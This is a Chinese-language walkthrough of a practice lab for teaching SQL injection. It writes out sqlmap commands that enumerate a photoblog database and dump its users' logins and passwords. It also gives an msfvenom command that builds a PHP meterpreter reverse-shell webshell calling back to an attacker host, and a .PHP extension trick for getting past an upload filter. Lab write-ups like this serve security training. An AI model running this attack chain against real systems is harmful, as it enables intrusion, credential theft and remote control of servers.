web安全sql注入
sql注入介绍
信息探测
这里的基本操作与之前的没有什么出入,
深入挖掘
深入挖掘,之后我们发现了一个敏感的网址/admin/login.php
打开之后,我们发现了一个类似的登录界面,这个时候,我们尝试使用弱口令,发现无法登陆,那我们就要去找用户名和密码了:
漏洞扫描
使用owasp-zap这个非常好用的漏洞扫描器:
打开owasp-zap:
对靶场进行攻击:
进行自动扫描,之后我们分析扫描结果:
我们发现了一个高危漏洞:sql注入
漏洞利用
接下来我们就要利用这个sql注入漏洞进行攻击:
http://192.168.56.107/cat.php?id=3-2
sqlmap -u "http://192.168.56.107/cat.php?id=3"
sqlmap -u "http://192.168.56.107/cat.php?id=3" --dbs
sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" --tables
sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" -T "users" --colunns
sqlmap -u "http://192.168.56.107/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump
我们把扫描结果的URL进行复制:
登陆之后我们发现了类似界面,这样我们可以以后利用这个页面
接下来我们开始准备获取用户名以及密码:
查看可能利用的错误输入造成sql注入:
查看所存在的数据库:
查看photoblog数据库中的表:
接下来准备进行密码破解:
我们得到了用户名以密码。
使用得到的用户名以及密码之后我们登陆成功了!!!
上传shell反弹权限
生成一个webshell:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.104 lport=4444 -f raw
保存webshell到桌面上:
设置对应的参数
之后我们上传对应webshell.php(注意这里可能对.php有过滤机制,这个时候我们可以使用.PHP来绕过过滤机制)
.php->.PHP
上传完对应的文件,之后记得点击对应的文件使其执行,我们才可以反弹回对应的权限。
这个时候就会反弹回对应的权限:
我们拿下了靶场,这个靶场设置的没有flag,就是为了学会sql注入而设计的。
ok!!!